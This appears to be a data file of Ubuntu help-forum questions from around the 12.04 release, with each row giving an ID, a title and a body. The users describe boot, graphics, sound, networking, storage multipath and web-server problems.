144986	boots to terminal	i had a system running 10.04 , i think . i upgraded it to 11.04 , everything was fine . but then when i upgraded it further to 11.10 , the system would only boot to a terminal , no desktop like before . i installed 12.04 on it instead , keeping /home which was on another partition ... but it 's still booting to terminal . i believe there may be some bad configuration files left over that are causing this . looking at other similar issues , i looked for /etc/x11/xorg.conf but it does n't exist . startx says it is n't installed . installing nvidia-current did n't help ( has gf 6600 gt video card ) . alt+f7 shows a blank screen . i used the alternate installer , and did n't select any of the optional packages it prompts during installation . should i have ? how do i get it to boot to desktop like normal ?
144987	upgrade from 11.04 to 12.04 failed - unable to login	yesterday i updgraded from 10.04 to 12.04 via the update-manager . at the end it said `` failed to upgrade due to too many errors '' . before that i got a lot of error messages that said packages could ne configured - they were all related to mono . then it force me to restart . when booting now , i see the pink screen ( without logo ) . after that it turns black and the cursor appears . then its flashing around between being bright and dark and showing the cursor and not showing it . but no way i see the login-screen . at the moment i am not able to boot from usb since my usb device is too large to be formated to fat-32 ( 8gb ) . this all is happening on this machine : amd e-350 processor ( 2x1,65ghz ) 4gb ddr3 ram 320gb sata ii hard drive amd® radeon™ hd 6320 thanks in advance to everyone who trys helping me ; ) i have to continue working with data from this machine so i´d be pleased to get my data accessible . greets ; )
144991	i have written a php code which executes a python prog..it is running on a lampp server how do i get the python libraries working ?	i am using ubuntu 11.10 . i want to enable the execution of python libraries on my lampp server . i have written a php code that does shell_exec ( ) to run a python script , but the libraries used in the python script are not working . how do i enable it on lampp ?
144995	ubuntu 12.04 . show windows issue . blank window appears	i 've got a problem with an action `` show windows '' which shows all windows when i reach a right down edge of my screen ( similar to expose at mac ) . since i installed ubuntu 12.04 this function has started making me problems . when i use it to check active apps and then i click on an app in a launcher which had been minimized when i used `` show windows '' , only blank window appears . i must resize it to see the content . it 's really annoying . my graphic card is nvidia geforce 9600 gt . can anyone help with this ?
144998	head up display ( hud )	i can not see many application ( such as libreoffice ) compatible with hud . is the hud feature fully functional in 12.04 lts ? if not when the amazing hud feature of ubuntu will become as a fully functional production ready state ?
145001	1080p on tv not working	i am trying to connect my laptop ( samsung series 5 ultrabook ) to my tv ( toshiba wlt66/67 series ) and get it to output to the tv at 1080i ( so basically 1920x1080 ) through hdmi the issue i have is that in 'displays ' the highest resolution that it gives the monitor is 1280x768 , however i know that the tv can output at 1920x1080 at 30hz as when i use windows 7 it allows me to do this . i looked around and found that i could use xrandr to try and get his resolution , however when i do : cvt 1920 1080 30 # 1920x1080 29.95 hz ( cvt ) hsync : 33.01 khz ; pclk : 79.75 mhz modeline `` 1920x1080_30.00 '' 79.75 1920 1976 2168 2416 1080 1083 1088 1102 -hsync +vsync xrandr -- newmode `` 1920x1080_30.00 '' 79.75 1920 1976 2168 2416 1080 1083 1088 1102 -hsync +vsync xrandr -- addmode hdmi1 1920x1080_30.00 xrandr -- output hdmi1 -- mode 1920x1080_30.00 my tv screen just remains blank : ( any help ? ( if you need any more information please ask )
145003	intermittent sound on an medion akoya s5610	the sound on my machine ( medion akoya s5610 ) works intermittently . if i reboot enough times i do get sound . this happened before i upgraded , when running oneiric too . i have fiddled around with alsa-base.conf , putting in different values for model in options snd-hda-intel model=but still the issue persists ( although i get the impression that i am more like to have sound on the next reboot if i have edited that file although i ca n't be sure of this ) . adding index=0 does not help the situation either . i have been thinking that this problem could be related some how to the order that driver modules are loaded . the snd-hda-intel module is also used for the sound card ( alc888 ) in my graphics card . could it be that these are some how competing ? if so , how do i add a preference when they are using the same module ? this is the result of lspci -nn | grep audio ( when sound was not working ) : 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati rv620 hdmi audio [ radeon hd 3400 series ] [ 1002 : aa28 ] i 've been wrestling with this problem for ages and ages and have spent days looking for answers on forums but to no avail so i would appreciate any help you can give . many thanks
145007	nvidia/ubuntu compatiblity problems	i run a multi boot machine with xp , windows 7 and ubuntu . occasionaly ubuntu looses its marbles and drops the resolution to 640 x 480 . i spend a month or two running on windows then ubuntu finds its marbles again and mysteriously resets the resolution back to normal ... really flakey . i have recently upgraded to 12.04 from 11.10 , and am experiencing annoying drop outs to the login screen when on youtube . i have noticed a few ubuntu users experiencing the same issue . i tried the solution that has helped many . ex . upgraded nvidia driver to 295.53 , but it does n't seem to make much difference . has anybody found a solution other than upgrading the nvidia driver ? system specs = nvidia geforce 8500 gt , amd athlon ( tm ) 64 x2 dual core processor 4800+ ă 2 it appears to be a nvidia/ubuntu compatibility problem , because xp and windows7 are not affected any advice would be enormously appreciated ... ..thanks
145012	how can i find my public ip using the terminal ?	i am on dhcp , having dynamic ip . finding your public ip when using a gui and a browser is extremely easy . simply go to google.com and search for `` what is my ip '' . google will display it in the very first line . however i am unable to find my public ip when inside ubuntu server . i have created a system with ubuntu server ( lamp stack ) for my personal use . this system boots up simply in terminal mode . i want to do ssh using some other system across the internet ; thus knowing the public ip becomes necessary . what is the command to display the current public ip adress of that system ?
145024	sword and sworcery segfaults , how can i reinstall it ?	i 've just bought , installed sword and sworcery via the software centre . when i run it , the screen goes black , the cursor changes and then all reverts back to normal . i found the executable that matches the menu item . /bin/sh /opt/swordandsworcery/run.sh when i run it from the console : segmentation fault ( core dumped ) my setup : linux jem-doxie 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux where to from here ? refund ? or can i do something ?
145030	how to login to internet using web based login while installing 12.04	i am trying to install ubuntu 12.04 on a laptop . but i have an internet connection that requires web based login , where an isp page in internet browser opens and i have to login to internet using the username and password to start browsing the web . while installing ubuntu , it tries to download some updates via internet . i am stuck here as i can not download updates before having to login to internet . is there any method to login or bypass this situation ? ?
145032	need a professional in ubuntu to help me in how to run silkroad like those ppl ?	i 'm new to ubuntu , i have ubuntu 12.04 lts x64 . i could not play silkroad online , so i asked google and i found that there 's application named wine , and i found some commands to run in the terminal , to install it . i did all that successfully . then i tried to start the game , via wine , and i got this error . now i do n't know what i should do . on youtube i saw players that can play silkroad on ubuntu without problems . check this out : http : //www.youtube.com/watch ? v=vy8ak8m43eq commands i used to install wine : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5
145034	atheros 9250 wireless card keeps on disconnecting	so i bought a lenovo g575 laptop for learning purposes and found that the connection just simply disconnects if i'ts in use for downloading and it also does disconnect in every 2-5 minutes while browsing.i tested the card with win7 , it worked nicely.since then i searched through all the topics connected to this card , also tried using older distros , maverick ended up with the same results as the actual 12.04 distribution.i dont think it 's the router cause i could access it from win7.it 's causing me a trouble using an external usb , cause it 's taken from another pc in the house.i would be really grateful if someone could explain what should i do to fix it . thanks in advance for the help
145039	ubuntugis `` failed to fetchâ error	i already try to install ubuntugis ( https : //launchpad.net/~ubuntugis/+archive/ppa ) since yesterday but fail when running apt-get update because of `` failed to fetch '' errors ( see also http : //blog.launchpad.net/ppa/failed-to-fetch-errors-for-ppas ) errors : csae9999 @ ubuntu : ~ $ sudo apt-get update [ sudo ] password for csae9999 : ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise release.gpg ign http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise/main translationindex fehl http : //ppa.launchpad.net precise/main sources 404 not found fehl http : //ppa.launchpad.net precise/main amd64 packages 404 not found fehl http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-de_de ign http : //ppa.launchpad.net precise/main translation-de ign http : //ppa.launchpad.net precise/main translation-en w : fehlschlag beim holen von http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : fehlschlag beim holen von http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : fehlschlag beim holen von http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . my sources.list file looks like this : # /etc/apt/sources.list /sources.list.d/ubuntugis-ppa-precise.list looks like this : deb http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu precise main according to ubuntugis lounchpad and lounchpad blog everything should be fine . please help , i need the gdal library for r rgdal ( via ubuntugis ) ! thanks a lot !
145041	how to achieve better quality in creating video from .jpg files with avconv ?	i 'm trying to make video from many jpg files exported by paraview . i have already found out that 'avconv ' can do that but the output quality is just not so good even with -s hd1080 option written in . jpeg files resolution is 1920x1080 so i believe they could do some good for me . file size is n't that much important , i want to be able to see details on the video . is it even possible ? if it is important i 'm running ubuntu 12.04 .
145044	is it possible to install the unity 2d panel in kubuntu without pulling in all of unity 's dependencies ?	i would like to avoid installing gnome dependencies , if possible . i figured this is possible as unity 2d is written in qt . thanks for your input !
145045	i ca n't su as root , my account type is admin but am i root ?	i installed ubuntu successfully , but then i tried `` su '' on terminal and entered my password , authentication failed ! and i do n't think that i 'm root , i do n't have root permissions , what should i do ? ... i went to user accounts , it says my account type is administrator , but that 's not root is it ? ? thanks : )
145052	xbmc passthrough audio and pulse	with xbmc , there are two audio settings . one is for for stereo audio , and the other is for passthrough audio ( if i were to enable ac3 and or dts then passthrough would be used ) : with the following ubuntu audio settings , if i enable dolby digital or dts then sound does not work when i play any media with those types of streams . however , stereo streams will still work : if change the ubuntu audio settings to built-in audio for output , and enable dolby/dts then media with those streams will work , but then stereo does not . this makes sense to me because if i have my cm8738 selected via ubuntu then xbmc could n't access it because pulse has it in use . the flip side where i set ubuntu audio to built-in i am no longer using the sound device hooped up to my speakers , but then cm8738 is freed up for passthrough/ac3/dts from xbmc . what i would like , is of course , for both to work at the same time ( without having to change device via ubuntu or inputs on my receiver ) . i want to pass dts or ac3 directly to my receiver for those streams , but still have stereo within xbmc and outside of xbmc to work . am i asking for too much ? or can this be done ? for reference here is the output of aplay -l : **** list of playback hardware devices **** card 0 : cmi8768 [ c-media cmi8768 ] , device 0 : cmi8738-mc8 [ c-media pci dac/adc ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : cmi8768 [ c-media cmi8768 ] , device 1 : cmi8738-mc8 [ c-media pci 2nd dac ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : cmi8768 [ c-media cmi8768 ] , device 2 : cmi8738-mc8 [ c-media pci iec958 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : intel [ hda intel ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : intel [ hda intel ] , device 1 : alc888 digital [ alc888 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
145055	no windows whatsoever after compiz reset	currently using 12.04 . this time i was trying to use the application switcher , and it asked me to resolve a few conflicts most of which were not easy to comprehend . so after some yes and no dialogue boxes leading me nowhere , i thought a reset should set things fine . however , after preferences- > reset to default , i ca n't see any window ! ! none whatsoever except the log out one when i press ctrl+alt+del all i can see is the wallpaper and the mouse pointer . i cant even see the terminal or anything when i press alt+f2 . i am posting this when i switch to ubuntu 2d ( i cant make out the difference between the two , but this just works for now almost the same way )
145057	vala compiler ( valac ) can not find lua package	the problem is very simple . the generated .c file has # include < lua.h > ; valac -c -- pkg lua luatest.vala which should be # include < lua52/lua.h > ; i have found all lua headers in /usr/include/lua52 , but pkg-config for vala ( c ) can not find them . the error is /home/aleksandar/programing/ewns-viewer/ewns-viewer.vala.c:8:17 : fatal error : lua.h : no such file or directory please help .
145058	how to allow a user totally control local web server ?	i installed a local web-server ( apache2 , php5 , mysql ) . all the time i want to edit some permissions or to create a folder or to add some lines to hosts i need to login as a root . do i need to grant privileges by the root all the time for this folders and files or is there a way to make it at once ? maybe i should reinstall webserver by the user i want to use one ?
145059	uninstalling ubuntu	i cant go into windows vista and my computer always goes straight into ubuntu and now i want to learn how to go back into windows and uninstall ubuntu please help me i 've tried other websites but they cant help . is it possible for me to be able to uninstall ubuntu when i 'm in ubuntu ?
145063	stuck on 12.04 install	brand new hp box -- installing from cd that is a good burn , have tried several times . i am stuck at `` creating ext4file system for / in partition # 3 '' been here for 25 minutes ? normal on a new partition on a new box ? what a headache below is the log from sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x27da6e45 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 762018974 380804687+ 82 linux swap / solaris /dev/sda3 762019840 968450047 103215104 83 linux /dev/sda4 968450048 976771119 4160536 c w95 fat32 ( lba )
145067	ubuntu 10.04 & ibm ds3524 with fc multipath , inactive path is [ failed ] [ faulty ] instead of [ active ] [ ghost ]	ok , this is my setup : fc switches ibm/brocade , switch1 and switch2 , independent fabrics . server ibm x3650 m2 , 2x qlogic qle2460 , 1 connected to each fc switch . storage ibm ds3524 , 2x controllers with 4x fc ports each , but only 2x connected on each . + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | hba1 server hba2 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | | | | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | switch1 | | switch2 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | | | | | | | | | | | | | | | | | | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | contr a , port 3 | contr a , port 4 | contr b , port 3 | contr b , port 4 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | storage | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ my /etc/multipath.conf is from the ibm redbook for the ds3500 , except i use a different setting for prio_callout , ibm uses /sbin/mpath_prio_tpc , but according to http : //changelogs.ubuntu.com/changelogs/pool/main/m/multipath-tools/multipath-tools_0.4.8-7ubuntu2/changelog , this was renamed to /sbin/mpath_prio_rdac , which i 'm using . devices { device { # ds3500 vendor `` ibm '' product `` 1746 fastt '' hardware_handler `` 1 rdac '' path_checker rdac failback 0 path_grouping_policy multibus prio_callout `` /sbin/mpath_prio_rdac /dev/ % n '' } } multipaths { multipath { wwid xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx alias array07 path_grouping_policy multibus path_checker readsector0 path_selector `` round-robin 0 '' failback `` 5 '' rr_weight priorities no_path_retry `` 5 '' } } the output of multipath -ll with controller a as the preferred path : root @ db06 : ~ # multipath -ll sdg : checker msg is `` directio checker reports path is down '' sdh : checker msg is `` directio checker reports path is down '' array07 ( xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ) dm-2 ibm ,1746 fast [ size=4.9t ] [ features=1 queue_if_no_path ] [ hwhandler=0 ] \_ round-robin 0 [ prio=2 ] [ active ] \_ 5:0:1:0 sdd 8:48 [ active ] [ ready ] \_ 5:0:2:0 sde 8:64 [ active ] [ ready ] \_ 6:0:1:0 sdg 8:96 [ failed ] [ faulty ] \_ 6:0:2:0 sdh 8:112 [ failed ] [ faulty ] if i change the preferred path using ibm ds storage manager to controller b , the output swaps accordingly : root @ db06 : ~ # multipath -ll sdd : checker msg is `` directio checker reports path is down '' sde : checker msg is `` directio checker reports path is down '' array07 ( xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ) dm-2 ibm ,1746 fast [ size=4.9t ] [ features=1 queue_if_no_path ] [ hwhandler=0 ] \_ round-robin 0 [ prio=2 ] [ active ] \_ 5:0:1:0 sdd 8:48 [ failed ] [ faulty ] \_ 5:0:2:0 sde 8:64 [ failed ] [ faulty ] \_ 6:0:1:0 sdg 8:96 [ active ] [ ready ] \_ 6:0:2:0 sdh 8:112 [ active ] [ ready ] according to ibm , the inactive path should be `` [ active ] [ ghost ] '' , not `` [ failed ] [ faulty ] '' . despite this , i do n't seem to have any i/o issues , but my syslog is being spammed with this every 5 seconds : jun 1 15:30:09 db06 multipathd : sdg : directio checker reports path is down jun 1 15:30:09 db06 kernel : [ 2350.282065 ] sd 6:0:2:0 : [ sdh ] result : hostbyte=did_ok driverbyte=driver_sense jun 1 15:30:09 db06 kernel : [ 2350.282071 ] sd 6:0:2:0 : [ sdh ] sense key : illegal request [ current ] jun 1 15:30:09 db06 kernel : [ 2350.282076 ] sd 6:0:2:0 : [ sdh ] < < vendor > > asc=0x94 ascq=0x1asc=0x94 ascq=0x1 jun 1 15:30:09 db06 kernel : [ 2350.282083 ] sd 6:0:2:0 : [ sdh ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 jun 1 15:30:09 db06 kernel : [ 2350.282092 ] end_request : i/o error , dev sdh , sector 0 jun 1 15:30:10 db06 multipathd : sdh : directio checker reports path is down jun 1 15:30:14 db06 kernel : [ 2355.312270 ] sd 6:0:1:0 : [ sdg ] result : hostbyte=did_ok driverbyte=driver_sense jun 1 15:30:14 db06 kernel : [ 2355.312277 ] sd 6:0:1:0 : [ sdg ] sense key : illegal request [ current ] jun 1 15:30:14 db06 kernel : [ 2355.312282 ] sd 6:0:1:0 : [ sdg ] < < vendor > > asc=0x94 ascq=0x1asc=0x94 ascq=0x1 jun 1 15:30:14 db06 kernel : [ 2355.312290 ] sd 6:0:1:0 : [ sdg ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 jun 1 15:30:14 db06 kernel : [ 2355.312299 ] end_request : i/o error , dev sdg , sector 0 does anyone know how i can get the inactive path to show `` [ active ] [ ghost ] '' instead of `` [ failed ] [ faulty ] '' ? i assume that once i can get that right then the spam in my syslog will end as well . one final thing worth mentioning is that the ibm redbook doc targets sles 11 so i 'm assuming there 's something a little different under ubuntu that i just have n't figured out yet . update : as suggested by mitch , i 've tried removing /etc/multipath.conf , and now the output of multipath -ll looks like this : root @ db06 : ~ # multipath -ll sdg : checker msg is `` directio checker reports path is down '' sdh : checker msg is `` directio checker reports path is down '' xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdm-1 ibm ,1746 fast [ size=4.9t ] [ features=0 ] [ hwhandler=0 ] \_ round-robin 0 [ prio=1 ] [ active ] \_ 5:0:2:0 sde 8:64 [ active ] [ ready ] \_ round-robin 0 [ prio=1 ] [ enabled ] \_ 5:0:1:0 sdd 8:48 [ active ] [ ready ] \_ round-robin 0 [ prio=0 ] [ enabled ] \_ 6:0:1:0 sdg 8:96 [ failed ] [ faulty ] \_ round-robin 0 [ prio=0 ] [ enabled ] \_ 6:0:2:0 sdh 8:112 [ failed ] [ faulty ] so its more or less the same , with the same message in the syslog every 5 minutes as before , but the grouping has changed .
145071	how to install ubuntu 12.04 within windows 7 with a cd image of ubuntu ( without use of an external cd/usb ) ?	the wubi installer that comes with ubuntu 12.04 does n't allow one to install ubuntu within windows . i downloaded the wubi installer available here ubuntu windows installer this howerver doesnt allow me to install with the existing image that i downloaded earlier . it downloads ubuntu afresh prior to installing . is there a way to install it with the existing cd image and without use of an external cd/dvd ( too lazy to buy one : p ) i used to be able to do this with the earlier versions of ubuntu just by mounting the cd image as a drive in windows ... and the installation would complete in minutes !
145075	webserver configuration to get drupal clean urls work proper	i have just configured a local web-server and migrated a site built on drupal 7 onto it . front page is loaded just fine but when i try to navigate i get 404 error . i`ve noticed that using not clean urls fixes it : mysite.com/ ? q=neaded-page so what kind of package or module or changes do i need to install/make to get it work proper ? thanks !
145077	fglrx support for ati firepro 2460 with 4 heads	i am running 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux with the firepro 2460 . this is a single gpu with 4 heads . i can get 3 monitors working fine each running under a different xserver display name , :0.0 , :0.1 , :0.2 . when i add the fourth monitor , i end up with the following error in xorg.0.log [ 4.063 ] ( ee ) fglrx ( 3 ) : display infrastructure failed due to hardware limitation [ 4.063 ] ( ee ) fglrx ( 3 ) : preinit failed is this the correct place to pose this question ? i have attached xorg.conf and xorg.0.log if anyone can direct me to an answer or the correct place to ask the question . thanks , donald kayser ========================== xorg.conf ============================================= section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` screen0 '' 0 0 screen `` screen1 '' rightof `` screen0 '' screen `` screen2 '' rightof `` screen1 '' screen `` screen3 '' rightof `` screen2 '' endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` monitor-0 '' option `` dpms '' `` true '' endsection section `` device '' identifier `` device-0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device-1 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device-2 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 2 endsection section `` device '' identifier `` device-3 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 3 endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` screen0 '' device `` device-0 '' monitor `` monitor-0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device-1 '' monitor `` monitor-0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device-2 '' monitor `` monitor-0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` device-3 '' monitor `` monitor-0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
145078	uninstall ubuntu 11.10	i was upgrading my ubuntu from 11.10 to 12.04 lts but the power went off . so when i restarted by laptop there was a black screen that came . then i downloaded 12.04 from windows 7 . it is rebooting from windows boot manager . now how do i remove 11.10 ubuntu .
145080	why is one apache2 virtual host slow and another not ?	i am running apache2 2.2.14 on ubuntu 10.04 . i have two virtual servers running , both using virtually the same conf script in sites-available . one of the pages ( robertsmetrology.krazycraig.com ) renders super fast ( 1 second f5 on index.html ) , no problems at all . the second ( robertsmetrology2.krazycraig.com ) takes forever to render ( 18 second f5 on index.html ) . contrary to the code , the fast loading site , being developed in frontpage has lots of scripts to run . the second , none , only html5 and css3 . i 'm using zoneedit as my dns server for both sites and the the zone records are exactly the same . i 've looked at the access and error logs as well as messages , going as far as changing the apache2 loglevel variable for the virtual servers to debug . i 've done a w3c validation and the only problems with the slow loading site are invalid meta tags and an & ( instead of & amp ; ) in the href property of an anchor tag ( e.g . href= '' http : //whatever.com ? a=1 & b=2 '' ) . and after fixing those the page render speed did n't change . both pages use the same images and text , the only real difference being the slow rendering page is html5 , using tags such article , header and footer , and the other uses div and table formatting everywhere . i am stumped as to why one page renders so slow and it 's contemporary so fast . can anyone point me in the right direction to debug this problem ? thanks for your help . edit : so i thought maybe there was something in the file that was causing the slow render . to check this , i replaced my index.html with an index.html that looks like this ... < ! doctype html > < html > < head > < /head > < body > test < /body > < /html > still it takes over 3 seconds to render .
145086	how to remake image of extracted files in usb ?	i extracted a ubuntu 12.04 amd64 in usb by startup disk creator and the original image is deleted when i install ubuntu 12.04 from usb now how can i remake iso image from usb without re download iso ?
145087	lubuntu panel applet or indicator to display mounted volumes	i 'm a satisfied lubuntu user but i can not find an applet or indicator that displays the mounted volumes ( and eventually allows to unmount them ) . so far the only way to know what is currently mounted is from the terminal ( command mount ) or open the file manager ( pcmanfm ) . if anybody knows a package i can install for the purpose ( panel applet or indicator ) please let me know .
145089	i ca n't connect to internet at all in ubuntu 12.04	my wireless connection does n't work . i 've tried this ubuntu documentation on wireless and i 've gotten no results . previously , i 've installed ubuntu 12.04 with vmware and the wireless connection worked . i have a dell inspiron laptop pentium ( r ) dual core cpu t4500 .
145091	why do some commercial apps have a section called 'also requires ' and free apps do n't ?	in the ubuntu software center paid ( commercial ) applications get a section called 'also requires ' which is quite neat . why do n't the free applications get this feature ? for example amnesia : the dark descent in usc says ( see screenshot also ) also requires : mouse opengl hardware acceleration . where does this information actually come from ?
145093	i want to set `nodeadkeys` , but where ?	i want to configure my keyboard to write characters like ^ or ~ with just one click . a friend told me , i have to set nodeadkeys somewhere , but not the place . so , where to change this configuration ( preferably manually in a .conf file ) . what i already tried : the only seemingly meaningful documentation i found about setting nodeadkeys , was in this german website . this page describes different ways to get through the gui menus , but all of them do n't work on my freshly setup ubuntu system ( with gnome ) . maybe it was written for older versions . it also describes how to set it manually in the xorg.conf , which should be found in /etc/x11/ , which is also not the case . i looked for an xorg.conf all over the system ( sudo find / -name `` xorg.conf '' ) but also did n't find anything . no result yet .
145095	how to install webmin on a desktop not on a server ?	need help how to install webmin on ubuntu 12.04 desktop not on ubuntu server ? i wa n't to install webmin on my ubuntu desktop not on server
145099	problem with aisleriot solitare since upgrading to 12.04	the game can be downloaded but all the previous options like `` re-start , close , etc . are not available . in order to get out of the game , i have to re-boot .
145104	12.04 install now just blank screen	i have attempted to install a new copy of 12.04 using usb stick instead of using download manager . everything went fine while using usb stick until i restarted after installation was complete . then , i got the screen with cursor and 4 lines of script with the first line saying `` could not write to bytes : broken pipes '' . i have used several versions of ubuntu from 6.04 , but this one seems broken . i have tried nouveau.blacklist and many other suggestions to no luck . i am using hp pavilion m7790y dual core processor system , with nvidia 7600gt video card , 4gb ram and two hard drives with vista on one and fresh install of ubuntu 12.04 on other . i 'm still looking for help to solve this problem . thanks in advance .
145110	running xampp does not work	i 've tried to download xampp , untar it in /opt/lampp and launch sudo ./lamp start but i get this output : starting xampp for linux 1.7.7 ... xampp : another web server daemon is already running . xampp : starting mysql ... xampp : could n't start mysql ! xampp : xampp-proftpd is already running . xampp for linux started . so i opened synaptic and i have installed mysql server . now i have 2 problems , if i restart my ubuntu 10.10 : every time i restart my ubuntu i have to retype sudo /etc/init.d/mysql stop if after stop mysql daemon i relaunch lampp i get same message : xampp : could n't start mysql ! /var/log/mysql.err and /var/log/mysql.log are empty..
145115	ubuntu raid in uefi system	i tried to make ubuntu raid in uefi system . i used 2x250 gb sata hdd . the raid is working properly . but i have some problem with the grub loader . only the 1st hdd had boot loader . so if i using only 2nd hdd , my computer does n't boot . how to make both hdd bootable ?
145116	i ca n't connect to the internet	i 'm newbie on ubuntu.i have a problem that i ca n't connect to the internet.but the wireless network are working good . the main problem is i have internet connection but when i open up firefox its say server not found , firefox ca n't find the server at.start.ubuntu.com . i use dualboot windows 7 & ubuntu 12.04.on my windows 7 , the connection are just fine.please help me , i cant wait to explore ubuntu without any internet connection .
145119	what is the difference mpi vs openmp ?	i just want to know the differences between mpi vs openmp for a school project i have . i 'm new on ubuntu and i ca n't find a trustworthy website . i tried so many now . please help me !
145121	how to stop banshee from converting my music to mp3 ?	when i am synchronizing my music with banshee , it stars converting my music into mp3 . how can i stop banshee to convert my music and make it just copying it ? my player can play nearly every music format , so converting it takes a lot of time and resources .
145122	how do i open a .tar.gz magazine file to edit with scribus ?	i downloaded a tar.gz file from translate full circle for translating this magazine in my native language , but i ca n't open it on scribus ( the software to edit any text files ) please help me i really wait for your help . thank you .
145124	unable to locate essential development tools	i 'm using ubuntu 11.04 ( vmware ) . i aim to implement openmp . im using gcc 4.5 compiler . i tried to install it by using the command sudo apt-get install gcc 4.5 . afterwards i proceed with gcc -fopenmp foo.c but the output was : gcc : foo.c : no such file or directory gcc : no input files â . now i tried to install the package by using : ubuntu @ ubuntu : ~ $ sudo apt-get install essential reading package lists ... done building dependency tree reading state information ... done e : unable to locate package essential . i also tried apt-cache search essential and after that sudo apt-get install essential-dev but the same error again , e : unable to locate package essential-dev any solution , please ? do i need to download any package ? what should i do ?
145129	ca n't drag & drop text to unity launcher ( e.g . url 's , highlighted text )	i 'm trying to create a unity launcher icon ( .dekstop file ) on which you can drop any ( selected/highlighted ) text from a web browser , google chrome in my case . i know you can use the `` mimetype= '' key in a .desktop file , but i ca n't find the right mime type for my scenario . i 've tried several text mimetypes and `` text/* '' , but none of them would work . does anyone know which mimetype i have to use in order for my launcher icon to accept text when hovering over it ?
145135	set default sound device output	i own a pair of usb powered speakers , and i am having trouble finding how to set the usb speakers as the default output . i found the setting where you can switch the outputs but no where to asssign a default . i took screenshot here :
145137	how do i open archive files from the command line ?	i need to open archive files from the command line . i can use things like `` jar tvf '' to list the contents , but i 'd like to get the explorer view . what is the name of the application that does this ?
145143	software center does n't show files installed	when i install a program in the software center that happens to install a menu option , it is discoverable through the menu , but if it is a package that is documentation , or command-line only , there is no simple way to discover how to actually access the content / software . is there a way in the software center to see what files or executables were installed with a particular package so i can actually use / read it ?
